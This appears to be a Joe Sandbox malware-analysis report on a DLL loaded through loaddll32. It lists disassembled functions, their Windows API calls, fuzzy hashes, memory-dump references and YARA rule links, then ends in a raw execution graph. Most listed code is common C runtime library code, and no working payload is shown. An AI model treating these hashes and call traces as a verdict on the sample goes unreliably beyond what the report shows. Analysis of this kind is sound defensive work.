              • Instruction ID: bb9b3e72322580271ff16fafcc9dce7d61706d896de649dfeb7fe008e0c223cc
              • Opcode Fuzzy Hash: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
              • Instruction Fuzzy Hash: EDE04F7128820AB7FF211E64ED06F493B79AF41B55F144020FA0CE80D4EB62E9208A89
              Function 6F9F0966 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNEL32(456EBF13,00000000,00000000,?), ref: 6F9F09C9
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F0C1B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F0C61
              • GetLastError.KERNEL32 ref: 6F9F0D04
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction ID: be717b506e847ebdd8a4899fab936612b21bd204c3155401ad22080883c17d45
              • Opcode Fuzzy Hash: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction Fuzzy Hash: 71D18AB5D056499FCF01CFA8D8809EDBBB8FF09314F14916AE466AB3A1D730E916CB50
              Function 6F9F9163 Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6F9F8ACF), ref: 6F9F917C
              • mydllmain.DLL1(00000001,?,?), ref: 6F9F92F0
              • mydllmain.DLL1(00000002,?,?), ref: 6F9F9336
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain$DecodePointer
              • String ID:
              • API String ID: 253863441-0
              • Opcode ID: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction ID: 4a631ff00f79ae1f6daa3b14ac59bb601d52ad68c09f487b39f19c2a0100ef4c
              • Opcode Fuzzy Hash: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction Fuzzy Hash: 9751597090660ADBEF109FA9ED483EDBF78BF8A314F018245D590AA2DCCB74D562CB54
              Function 6F9F1A14 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • GetLastError.KERNEL32 ref: 6F9F1A78
              • __dosmaperr.LIBCMT ref: 6F9F1A7F
              • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F1AB9
              • __dosmaperr.LIBCMT ref: 6F9F1AC0
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction ID: 7f9164fb7cac6044c892e292e2789cdcb407ab16005dc69322be420e244c422d
              • Opcode Fuzzy Hash: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction Fuzzy Hash: 0121D4B1606705AFD7509F76C88095BB7BDFF16368710851AE828972C0E731EC928BD0
              Function 6F9F2D68 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6F9F2D70
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DA8
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DC8
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction ID: 1613eefbff378ab773b0501895d883bd5d73bf501c341c8cdfcdd4f4740115ae
              • Opcode Fuzzy Hash: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction Fuzzy Hash: E21126B15076967FAB129BB59D8CEAF6A6CDF9A2E83100014F901D11C1FB30DE1287B1
              Function 6F9F82CD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000), ref: 6F9F82E4
              • GetLastError.KERNEL32(?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?,?,6F9F1332,00000000), ref: 6F9F82F0
                • Part of subcall function 6F9F82B6: CloseHandle.KERNEL32(FFFFFFFE,6F9F8300,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?), ref: 6F9F82C6
              • ___initconout.LIBCMT ref: 6F9F8300
                • Part of subcall function 6F9F8278: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F82A7,6F9F694E,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F828B
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F8315
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction ID: a346450a17862f2d572a62213856802eb06effed2dd63387ee0b1c28c125e7fd
              • Opcode Fuzzy Hash: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction Fuzzy Hash: B8F01C3650AA15BBCF521F92DC0498D3F76FF0A7F1B088010FA1895164C632D8319F90
              Function 6F9E51CF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • EncodePointer.KERNEL32(00000000,?), ref: 6F9E51F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction ID: 7181ef55fda0e5629bce5e0589bcddf746c721b565cb50da6ae142922ba2d515
              • Opcode Fuzzy Hash: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction Fuzzy Hash: F3416832A00209AFCF02CFA8CC80AEE7BB9FF49314F148199F915A7291D735E950DB51
              Function 6F9EFD31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(00000FA0,-00000020,6F9F033F,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD61
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD71
              Strings
              • InitializeCriticalSectionEx, xrefs: 6F9EFD41
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpinmydllmain
              • String ID: InitializeCriticalSectionEx
              • API String ID: 3077948437-3084827643
              • Opcode ID: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction ID: ebf86ec77776e403c7eab09ca27d9bd56e07b3ccbeb410d9829cd61b024731fc
              • Opcode Fuzzy Hash: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction Fuzzy Hash: F0E09231442519B7CF221F60DC04D9D3F26DF80779F008012FA2C552D0C732D8619BD0
              Function 6F9EFCEF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(?,00000001,6F9E60D4,00000001,?,6F9EC1F7,?,?,?,?,?,00000000,6F9EAAAA,?,00000000,00000001), ref: 6F9EFD1C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID: FlsSetValue$ccs
              • API String ID: 979097349-2990521015
              • Opcode ID: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction ID: 2df782de406a8d0de655af6ac295f089cd7ee8a57e0e35dfae345fec7d5435b3
              • Opcode Fuzzy Hash: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction Fuzzy Hash: 93E0CD3254252973DA212F91AC08DD97F29DBC06B9B048063FF18962D0DA31D861D7D1
              Function 6F9EFC32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22memoryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: Allocmydllmain
              • String ID: FlsAlloc
              • API String ID: 2444374858-671089009
              • Opcode ID: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction ID: a7bd659a1ef523b56b66f01a8083a3fbed3ef9ff4d840c06664dea7a40f12a26
              • Opcode Fuzzy Hash: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction Fuzzy Hash: FBE0C23198692573CA322F54BD0899A7E19CFE1BBDB054023FF14953C19A20D81297E1

              Execution Graph

              Execution Coverage:2.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:2000
              Total number of Limit Nodes:33
              execution_graph 14995 6f9e5393 14996 6f9e53a1 ___except_validate_context_record 14995->14996 15006 6f9e4ae5 14996->15006 14999 6f9e53e6 15000 6f9e5404 14999->15000 15020 6f9e5748 14999->15020 15001 6f9e5471 15023 6f9e4e2a 15001->15023 15002 6f9e540c 15002->15000 15002->15001 15005 6f9e544c mydllmain 15002->15005 15005->15000 15007 6f9e4af3 __InternalCxxFrameHandler 28 API calls 15006->15007 15008 6f9e4aea 15007->15008 15009 6f9e4af2 15008->15009 15078 6f9f2ffb 15008->15078 15009->14999 15009->15000 15009->15002 15012 6f9ed0fa 15117 6f9ec846 15012->15117 15013 6f9ed0db IsProcessorFeaturePresent 15016 6f9ed0e7 15013->15016 15015 6f9ed0d1 15015->15012 15015->15013 15111 6f9ec07a 15016->15111 15138 6f9e5760 15020->15138 15022 6f9e575b 15022->15000 15028 6f9e4e4a __FrameHandler3::FrameUnwindToState 15023->15028 15024 6f9e515d 15025 6f9ed0c1 CallUnexpected 50 API calls 15024->15025 15037 6f9e5163 15024->15037 15026 6f9e51ce 15025->15026 15027 6f9e5132 15027->15024 15029 6f9e5130 15027->15029 15187 6f9e51cf 15027->15187 15028->15024 15030 6f9e4f2c 15028->15030 15031 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15028->15031 15033 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15029->15033 15030->15027 15032 6f9e4fb5 15030->15032 15076 6f9e4f32 type_info::operator== 15030->15076 15035 6f9e4eac 15031->15035 15036 6f9e50cc 15032->15036 15168 6f9e3b1f 15032->15168 15033->15024 15035->15037 15040 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15035->15040 15039 6f9e50e0 15036->15039 15183 6f9e462a 15036->15183 15037->15000 15039->15029 15042 6f9e50fc 15039->15042 15044 6f9e5106 15039->15044 15045 6f9e5121 15039->15045 15043 6f9e4eba 15040->15043 15042->15029 15042->15044 15046 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15043->15046 15047 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15044->15047 15048 6f9e5848 __InternalCxxFrameHandler 50 API calls 15045->15048 15055 6f9e4ec2 15046->15055 15049 6f9e5111 15047->15049 15050 6f9e512a 15048->15050 15051 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15049->15051 15050->15029 15052 6f9e518d 15050->15052 15051->15076 15054 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15052->15054 15053 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15056 6f9e4f0b 15053->15056 15057 6f9e5192 15054->15057 15055->15024 15055->15053 15056->15030 15061 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15056->15061 15058 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15057->15058 15062 6f9e519a 15058->15062 15060 6f9e4fd6 ___TypeMatch 15060->15036 15173 6f9e4daa 15060->15173 15064 6f9e4f15 15061->15064 15212 6f9e3d0b RtlUnwind 15062->15212 15063 6f9e516d 15065 6f9e462a __InternalCxxFrameHandler mydllmain 15063->15065 15066 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15064->15066 15069 6f9e5175 __InternalCxxFrameHandler 15065->15069 15070 6f9e4f20 15066->15070 15074 6f9e47d6 _com_raise_error 2 API calls 15069->15074 15163 6f9e5848 15070->15163 15071 6f9e51ae 15073 6f9e5748 __InternalCxxFrameHandler 62 API calls 15071->15073 15075 6f9e51ba __InternalCxxFrameHandler 15073->15075 15074->15052 15213 6f9e56bf 15075->15213 15076->15063 15204 6f9ed085 15076->15204 15120 6f9f2f29 15078->15120 15081 6f9f3040 15082 6f9f304c ___scrt_is_nonwritable_in_current_image 15081->15082 15083 6f9ed968 __dosmaperr 17 API calls 15082->15083 15084 6f9f309c 15082->15084 15085 6f9f30ae __InternalCxxFrameHandler 15082->15085 15090 6f9f307d __InternalCxxFrameHandler 15082->15090 15083->15090 15086 6f9ee7b1 __dosmaperr 17 API calls 15084->15086 15087 6f9f30e4 __InternalCxxFrameHandler 15085->15087 15131 6f9f189f EnterCriticalSection 15085->15131 15088 6f9f30a1 15086->15088 15093 6f9f321e 15087->15093 15094 6f9f3121 15087->15094 15108 6f9f314f 15087->15108 15091 6f9ec276 __wsopen_s 48 API calls 15088->15091 15090->15084 15090->15085 15110 6f9f3086 15090->15110 15091->15110 15096 6f9f3229 15093->15096 15136 6f9f18e7 LeaveCriticalSection 15093->15136 15102 6f9ed817 _unexpected 48 API calls 15094->15102 15094->15108 15097 6f9ec846 __InternalCxxFrameHandler 29 API calls 15096->15097 15099 6f9f3231 15097->15099 15100 6f9f319f 15104 6f9ed817 _unexpected 48 API calls 15100->15104 15101 6f9f31da mydllmain 15106 6f9f31b5 15101->15106 15103 6f9f3144 15102->15103 15105 6f9ed817 _unexpected 48 API calls 15103->15105 15107 6f9f31a4 mydllmain 15104->15107 15105->15108 15109 6f9ed817 _unexpected 48 API calls 15106->15109 15106->15110 15107->15106 15132 6f9f31ca 15108->15132 15109->15110 15110->15015 15112 6f9ec096 __InternalCxxFrameHandler __fread_nolock 15111->15112 15113 6f9ec0c2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15112->15113 15116 6f9ec193 __InternalCxxFrameHandler 15113->15116 15114 6f9e2e45 _ValidateLocalCookies 5 API calls 15115 6f9ec1b1 15114->15115 15115->15012 15116->15114 15118 6f9ec683 __InternalCxxFrameHandler 29 API calls 15117->15118 15119 6f9ec857 15118->15119 15121 6f9f2f35 ___scrt_is_nonwritable_in_current_image 15120->15121 15126 6f9f189f EnterCriticalSection 15121->15126 15123 6f9f2f43 15127 6f9f2f85 15123->15127 15126->15123 15130 6f9f18e7 LeaveCriticalSection 15127->15130 15129 6f9ed0c6 15129->15015 15129->15081 15130->15129 15131->15087 15133 6f9f31ce 15132->15133 15135 6f9f3196 15132->15135 15137 6f9f18e7 LeaveCriticalSection 15133->15137 15135->15100 15135->15101 15135->15110 15136->15096 15137->15135 15139 6f9e576c ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 15138->15139 15140 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15139->15140 15146 6f9e5787 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 15140->15146 15142 6f9e5807 15144 6f9e580c __FrameHandler3::FrameUnwindToState 15142->15144 15152 6f9ed0c1 15142->15152 15144->15022 15146->15142 15147 6f9e582e 15146->15147 15148 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15147->15148 15149 6f9e5833 15148->15149 15150 6f9e583e 15149->15150 15151 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15149->15151 15150->15142 15151->15150 15153 6f9f2ffb __InternalCxxFrameHandler 2 API calls 15152->15153 15154 6f9ed0c6 15153->15154 15155 6f9ed0d1 15154->15155 15157 6f9f3040 __InternalCxxFrameHandler 49 API calls 15154->15157 15156 6f9ed0db IsProcessorFeaturePresent 15155->15156 15162 6f9ed0fa 15155->15162 15158 6f9ed0e7 15156->15158 15157->15155 15160 6f9ec07a __InternalCxxFrameHandler 8 API calls 15158->15160 15159 6f9ec846 __InternalCxxFrameHandler 29 API calls 15161 6f9ed104 15159->15161 15160->15162 15162->15159 15164 6f9e58dc 15163->15164 15167 6f9e585c ___TypeMatch 15163->15167 15165 6f9ed0c1 CallUnexpected 50 API calls 15164->15165 15166 6f9e58e1 15165->15166 15167->15030 15169 6f9e3b3b 15168->15169 15170 6f9e3b72 15169->15170 15171 6f9ed0c1 CallUnexpected 50 API calls 15169->15171 15170->15060 15172 6f9e3b8d 15171->15172 15174 6f9e4dc9 15173->15174 15175 6f9e4dbc 15173->15175 15229 6f9e3d0b RtlUnwind 15174->15229 15225 6f9e4d11 15175->15225 15178 6f9e4dde 15179 6f9e5760 __FrameHandler3::FrameUnwindToState 62 API calls 15178->15179 15180 6f9e4def __FrameHandler3::FrameUnwindToState 15179->15180 15230 6f9e54f0 15180->15230 15182 6f9e4e17 __InternalCxxFrameHandler 15182->15060 15185 6f9e4636 ___scrt_is_nonwritable_in_current_image 15183->15185 15184 6f9e4674 __InternalCxxFrameHandler 15184->15039 15185->15184 15186 6f9e46ab mydllmain 15185->15186 15186->15184 15188 6f9e52fa 15187->15188 15189 6f9e51e5 15187->15189 15188->15029 15190 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15189->15190 15191 6f9e51ec 15190->15191 15192 6f9e51f3 EncodePointer 15191->15192 15202 6f9e522e 15191->15202 15195 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15192->15195 15193 6f9e52ff 15196 6f9ed0c1 CallUnexpected 50 API calls 15193->15196 15194 6f9e524b 15197 6f9e3b1f __InternalCxxFrameHandler 50 API calls 15194->15197 15199 6f9e5201 15195->15199 15198 6f9e5304 15196->15198 15201 6f9e5262 15197->15201 15200 6f9e3beb __InternalCxxFrameHandler 62 API calls 15199->15200 15199->15202 15200->15202 15201->15188 15203 6f9e4daa __InternalCxxFrameHandler 65 API calls 15201->15203 15202->15188 15202->15193 15202->15194 15203->15201 15205 6f9ed091 ___scrt_is_nonwritable_in_current_image 15204->15205 15206 6f9ed817 _unexpected 50 API calls 15205->15206 15207 6f9ed096 15206->15207 15208 6f9ed09d mydllmain 15207->15208 15209 6f9ed0ab 15207->15209 15208->15209 15210 6f9ed0c1 CallUnexpected 50 API calls 15209->15210 15211 6f9ed0c0 15210->15211 15212->15071 15214 6f9e56cb __EH_prolog3_catch 15213->15214 15215 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15214->15215 15216 6f9e56d0 15215->15216 15217 6f9e56f3 15216->15217 15291 6f9e5d83 15216->15291 15219 6f9ed0c1 CallUnexpected 50 API calls 15217->15219 15221 6f9e56f8 15219->15221 15226 6f9e4d1d ___scrt_is_nonwritable_in_current_image 15225->15226 15244 6f9e4bd3 15226->15244 15228 6f9e4d45 __InternalCxxFrameHandler ___AdjustPointer 15228->15174 15229->15178 15231 6f9e54fc ___scrt_is_nonwritable_in_current_image 15230->15231 15250 6f9e3d8f 15231->15250 15234 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15235 6f9e5528 15234->15235 15236 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15235->15236 15237 6f9e5533 15236->15237 15238 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15237->15238 15239 6f9e553e 15238->15239 15240 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15239->15240 15241 6f9e5546 __InternalCxxFrameHandler 15240->15241 15255 6f9e5643 15241->15255 15247 6f9e4bdf ___scrt_is_nonwritable_in_current_image 15244->15247 15245 6f9ed0c1 CallUnexpected 50 API calls 15246 6f9e4d10 15245->15246 15248 6f9e4c30 mydllmain 15247->15248 15249 6f9e4c3b __fread_nolock ___AdjustPointer 15247->15249 15248->15249 15249->15228 15249->15245 15251 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15250->15251 15252 6f9e3da0 15251->15252 15253 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15252->15253 15254 6f9e3dab 15253->15254 15254->15234 15266 6f9e3db3 15255->15266 15257 6f9e5654 15258 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15257->15258 15259 6f9e565a 15258->15259 15260 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15259->15260 15262 6f9e5665 15260->15262 15261 6f9e562b 15261->15182 15262->15261 15283 6f9e4730 15262->15283 15265 6f9e462a __InternalCxxFrameHandler mydllmain 15265->15261 15267 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15266->15267 15268 6f9e3dbc 15267->15268 15269 6f9e3dc4 15268->15269 15270 6f9e3dd2 15268->15270 15271 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15269->15271 15272 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15270->15272 15273 6f9e3dcc 15271->15273 15274 6f9e3dd7 15272->15274 15273->15257 15274->15273 15275 6f9ed0c1 CallUnexpected 50 API calls 15274->15275 15276 6f9e3dfa 15275->15276 15277 6f9e2e45 _ValidateLocalCookies 5 API calls 15276->15277 15278 6f9e3e0f ___CxxFrameHandler 15277->15278 15279 6f9e3e69 15278->15279 15282 6f9e3e1a 15278->15282 15286 6f9e3d0b RtlUnwind 15278->15286 15287 6f9e3beb 15279->15287 15282->15257 15284 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15283->15284 15285 6f9e4738 15284->15285 15285->15261 15285->15265 15286->15279 15288 6f9e3c0d __InternalCxxFrameHandler 15287->15288 15290 6f9e3bfb 15287->15290 15289 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15288->15289 15289->15290 15290->15282 15292 6f9e4ae5 __InternalCxxFrameHandler 62 API calls 15291->15292 15293 6f9e5d89 15292->15293 15294 6f9e5d9a 15293->15294 15295 6f9e5d90 mydllmain 15293->15295 15296 6f9ed085 _unexpected 51 API calls 15294->15296 15295->15294 15297 6f9e5d9f 15296->15297 15340 6f9f2e87 15341 6f9f2eed 15340->15341 15344 6f9f2ea0 15340->15344 15342 6f9f2ea8 mydllmain 15346 6f9ee688 56 API calls 15342->15346 15343 6f9f2ebe 15343->15341 15345 6f9f2ed6 mydllmain 15343->15345 15344->15342 15344->15343 15345->15343 15346->15344 15357 6f9eaf81 15358 6f9f01a6 ___scrt_uninitialize_crt 79 API calls 15357->15358 15359 6f9eaf89 15358->15359 15367 6f9efe54 15359->15367 15361 6f9eaf8e 15362 6f9f01af 